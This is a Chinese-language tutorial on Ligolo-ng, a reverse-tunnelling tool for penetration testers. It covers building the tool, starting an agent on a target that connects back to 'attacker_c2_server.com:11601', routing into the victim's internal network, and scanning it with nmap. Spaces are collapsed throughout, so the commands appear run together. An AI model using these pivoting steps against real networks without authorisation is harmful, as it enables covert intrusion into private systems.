如何使用Ligolo-ng建立隐蔽通信通道

关于Ligolo-ngLigolo-ng是一款高级通道工具，它基于TUN接口实现其功能。Ligolo-ng是一款轻量级快速工具，可以帮助渗透测试人员在不支持SOCKS的情况下使用反向TCP/TLS连接建立隐蔽的通信通道。功能介绍Tun接口（不再需要SOCKS）；简洁的UI界面，支持选择代理和网络信息；使用方便，安装方便；基于Let'sEncrypt的自动证书配置；高性能（多路复用）；无需高级权限；套接字监听/代理绑定；多平台代理支持；工具搭建（一）搭建Ligolo-ng$gobuild-oagentcmd/agent/main.go$gobuild-oproxycmd/proxy/main.go#BuildagentforWindows$GOOS=windowsgobuild-oagent.execmd/agent/main.go（二）安装Ligolo-ng，我们需要在我们的命令和控制服务器上启用代理服务。默认使用11601端口监听：$sudoiptuntapadduser[your_username]modetunligolo$sudoiplinksetligoloup$./proxy-h#Helpoptions$./proxy-autocert#AutomaticallyrequestLetsEncryptcertificates工具使用首先，我们需要在目标设备上启动agent（没有特殊要求）权限要求）：$./agent-connectattacker_c2_server.com:11601此时代理服务器上会出现会话链接：INFO[0102]Agentjoined.name=nchatelain@nworkstationremote="XX.XX.XX.XX:38000"使用“session”命令选择代理：ligolo-ng?session?指定session:1-nchatelain@nworkstation-XX.XX.XX.XX:38000使用“ifconfig”命令显示agent的网络配置信息：[Agent:nchatelain@nworkstation]?ifconfig[...]┌──────────────────────────────────────────────────────┐│界面3│├──────────────────┬───────────────────────────────────────────────┤│Name│wlp3s0││HardwareMAC│de:ad:be:ef:ca:fe│MTU│1500│Flags│up|broadcast|multicast││IPv4Address│192.168.0.30/24│└────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘在代理/中继服务器上添加一条指向192.168.0.0/24代理网络的路由：$sudoiprouteadd192.168.0.0/24devligolo最后,在agent上打开一个通信通道：[Agent:nchatelain@nworkstation]?start[Agent:nchatelain@nworkstation]?INFO[0690]Startingtunneltonchatelain@nworkstation现在可以通过代理服务器访问192.168.0.0/24代理网络：$nmap192.168.0.0/24-v-sV-n[...]$rdesktop192.168.0.123[...]支持的协议/数据包TCPUDPICMP性能在Ligolo-ng的帮助下，您可以轻松达到100的速度兆比特/秒下面给出的测试结果是iperf在200Mbits/s服务器上测试的200Mbits/s链路：$iperf3-c10.10.0.1-p24483Connectingtohost10.10.0.1,port24483[5]local10.10.0.224port50654connectedto10.10.0.1port24483[ID]IntervalTransferBitrateRetrCwnd[5]0.00-1.00sec12.5MBytes105Mbits/sec0164KBytes[5]1.00-2.00sec12.7MBytes107Mbits/sec0263KBytes[5]2.00-3.00sec12.4MBytes104Mbits/sec0263KBytes[5]3.00-4.00sec12.7MBytes106Mbits/sec0263KBytes[5]4.00-5.00sec13.1MBytes110Mbits/sec2134KBytes[5]5.00-6.00sec13.4MBytes113Mbits/sec0147KBytes[5]6.00-7.00sec12.6MBytes105Mbits/sec0158KBytes[5]7.00-8.00sec12.1MBytes101Mbits/sec0173KBytes[5]8.00-9.00sec12.7MBytes106Mbits/sec0182KBytes[5]9.00-10.00sec12.6MBytes106Mbits/sec0188KBytes------------------------[ID]IntervalTransferBitrateRetr[5]0.00-10.00sec127MBytes106Mbits/sec2sender[5]0.00-10.08sec125MBytes104Mbits/secreceiver备注由于代理未以提升的权限运行，因此它无法转发原始数据包。当您执行“NMAPSYN-SCAN”时，将在代理上执行TCPconnect()。使用Nmap时，应使用“--unprivileged”或“-PE”以避免误报。工具演示视频地址：【点我观看】项目地址Ligolo-ng：【GitHub传送门】